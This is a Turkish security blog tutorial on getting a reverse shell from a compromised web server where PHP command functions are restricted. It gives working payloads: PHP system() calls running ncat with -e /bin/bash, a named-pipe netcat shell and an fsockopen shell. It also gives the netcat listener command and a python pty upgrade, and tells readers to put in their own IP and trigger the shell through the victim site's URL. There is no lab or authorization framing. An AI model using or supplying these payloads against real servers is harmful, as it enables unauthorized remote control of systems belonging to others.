Secure Web Turkey
  • cPanel Optimizasyon
  • Sunucu Optimizasyon
  • Script Zafiyet Kontrolü
  • Hakkımızda
  • İletişim
Sonuç yok
Tüm sonuçları gör
Secure Web Turkey
  • cPanel Optimizasyon
  • Sunucu Optimizasyon
  • Script Zafiyet Kontrolü
  • Hakkımızda
  • İletişim
Sonuç yok
Tüm sonuçları gör
Secure Web Turkey
Sonuç yok
Tüm sonuçları gör

Kısıtlı Sunucuda Reverse Shell Almak

Celal Gülsar Yazar Celal Gülsar
Aralık 12, 2020
Genel
5 dk okuma süresi

Kısıtlı Sunucuda Reverse Shell Almak

Kısıtlı Sunucuda Reverse Shell Almak için ilk öncelikle reverse shellden bahsetmekte fayda var. Reverse Shell ters kabuk anlamına gelir. Saldırgan makinenin hedef makine ile kurduğu bir shelldir. Saldırgan kendi bilgisayarından hedef sunucuda komut çalıştırıp çıktısını alır.

Shell konumuzda nasıl koyalıkla reverse shell alabileceğinizi göstermiştik. Web Shell Nedir ? Detaylı anlatım için bu konumuzu kesinlikle okuyun: https://www.secure.web.tr/web-shell-nedir-ne-ise-yarar/

Bu konumuzda komut çalıştırma fonksiyonlarının birçoğu kısıtlı olan, web shellde BC (back connect) kısmı çalışmayan sunucuda reverse shell almayı gösteriyoruz.

Kısıtlı Sunucuda Nasıl Reverse Shell Alınır ?

İlk olarak shellimize bakalım

Disable Functions bölümüne baktığımızda bir çok komut çalıştırma komutumuz disabled (kapalı)

BC kısmına geldiğimizde ise reverse shell alamıyoruz.

Disable funcitonsları kontrol edelim. Disable Funcitons bölümün yanında bulunan Show All yazan bölüme tıklıyoruz

Kısıtlı Sunucu

Burada system komutunu göremedik. System komutu PHP dilinde komut çalıştırmamızı sağlayan bir fonksiyon.
Bu fonksiyonu kullanarak reverse shell alabiliriz.

Kısıtlı Sunucuda Reverse Shell Almak

Make File diyerek reverse.php adında bir dosya oluşturmaya çalışıyorum.

Kısıtlı Sunucu

Fakat sunucu o kadar kısıtlı ki sunucuda dosya oluşturmamıza bile izin vermiyor. System fonksiyonunu kullanmak için hazır PHP dosyalarını kullanabilirsiniz veya shelli upload ettiğimiz yerden PHP dosyamızı upload (yükleyebiliriz) edebiliriz. Ben sitede bulunan bir PHP dosyasını kullanacağım.

PHP dosyamızı açıp içine

<?php system("ncat 127.0.0.1 4444 -e /bin/bash") ?>

Yazıyoruz. Sizler 127.0.0.1 yerine IP adresinizi yazabilirsiniz.

Sonra bunu kaydediyoruz.

Terminalimizi açıyoruz.

netcat -nlvp 4444

Yazıyoruz ve enter diyoruz.

Evet şuan 4444 portunu dinliyoruz. Şimdi tek yapmamız gereken yazdığımız PHP kodunu çalıştırmak. Bunun için PHP kodumuzun yazılı olduğu dosyayı internetten açmamız gerekiyor.

site.com/dosyanız.php adresine giderek çalıştırıyoruz.

Evet şimdi adresimize isteğimizi attığımız gibi reverse shelli alacağız.

Evet Connection received (bağlantı alındı) yazısı geldi.

Şimdi bir komut çalıştıralım.

Evet gördüğümüz gibi komut çalışıyor. Fakat bu shell çok kullanışsız. Bulunduğumuz dizini hangi kullanıcıda olduğumuzu vs göstermemekte.
Bunun için hemen şu komuyu yazıyoruz.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Sunucuda python3 yüklü olmayabilir. Başta bulunan python3 yerine sadece python yazmanız yeterli olacaktır.

Evet komutumuzu girelim.

Girdikten sonra bulunduğumuz kullanıcı ve dizin önümüze geldi. Shellimiz güzelleşti. Daha da verimli bir hale geldi.

Evet böylelikle kısıtlı sunucudan shell aldık.

Bir diğer yöntem bash ile reverse shell almaktır.
PHP dosyamızın içine bu komutu yazabilrsiniz.

<?php system("/bin/sh 0</tmp/backpipe | nc 127.0.0.1 4444 1>/tmp/backpipe")?>

127.0.0.1 yerine kendi IP adresinizi yazabilirsiniz.

Sonrası yukarıda bulunan işlemlerin aynısı.

<?php 
$sock=fsockopen("127.0.0.1",4444);system("/bin/sh -i <&3 >&3 2>&3");
?>

Bu yöntemide kullanabilirsiniz.

Bir sürü Reverse Shell yöntemi var. Daha fazlasını görmek isterseniz şu bağlantıyı kaynak olarak bırakayım.

Okuduğunuz için teşekkürler. Bu konumuzu mutlaka okuyun:

Web Shell Nedir ? Ne işe Yarar ? Nasıl Kullanılır ?
Etiketler: back connectsunucu bypass
PaylaşTweetPin

İlişkili Yazılar

Yetki Yükseltme (Privilege Escalation) Nedir ?
Genel

Yetki Yükseltme (Privilege Escalation) Nedir ?

Yetki Yükseltme (Privilege Escalation) Nedir ? Yetki Yükseltme (Privilege Escalation) Nedir ? Yetki yükseltme adından anlaşılacağı gibi bir sistemde daha...

Aralık 24, 2020
Root Nedir ?
Genel

Root Nedir ?

Root Nedir ? Root Nedir ? Root kök kullanıcı anlamına gelir. Linux ve Unix temelli sistemlerde ful yetkiye sahip kullanıcıdır. Root Nerelerde...

Aralık 21, 2020
Python ile DoS Aracı Nasıl Yazılır ?
Genel

Python ile DoS Aracı Nasıl Yazılır ?

Python ile DoS Aracı Nasıl Yazılır ? Python ile GET ve POST isteklerini requests gibi modüllerle kolaylıkla atabiliyoruz bu konumuzda...

Aralık 18, 2020
Sunucu Optimizasyonu Nedir ?
Genel

Sunucu Optimizasyonu Nedir ?

Sunucu Optimizasyonu Nedir ? Sunucu Optimizasyonu Nedir ? Sunucu optimizyonu, optimizasyon kelimesinden de anlaşılabileceği gibi uyumlaştırma işlemidir. Paylaşımlı veya paylaşımsız...

Aralık 17, 2020

Bir cevap yazın Cevabı iptal et

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Önerilen

comodo waf mod security

cPanel&WHM Comodo Waf Kurulumu

Mayıs 14, 2019
bWAPP Nedir ? Nasıl Kurulur ?

bWAPP Nedir ? Nasıl Kurulur ?

Aralık 3, 2020
Güvenli Şifre Nasıl Oluşturulur ?

Güvenli Şifre Nasıl Oluşturulur ?

Aralık 10, 2020
Yetki Yükseltme (Privilege Escalation) Nedir ?

Yetki Yükseltme (Privilege Escalation) Nedir ?

Aralık 24, 2020
  • Hakkımızda
  • İletişim
  • Script Zafiyet Kontrolü
  • Cms Güvenliği
  • cPanel Optimizasyon
+90536 680 3775
Sonuç yok
Tüm sonuçları gör
  • Ana Sayfa
  • Cms Güvenliği
  • cPanel Optimizasyon
  • Hakkımızda
  • İletişim
  • Script Zafiyet Kontrolü
Web sitemizde size en iyi deneyimi sunabilmemiz için çerezleri kullanıyoruz. Bu siteyi kullanmaya devam ederseniz, bunu kabul ettiğinizi varsayarız.Tamam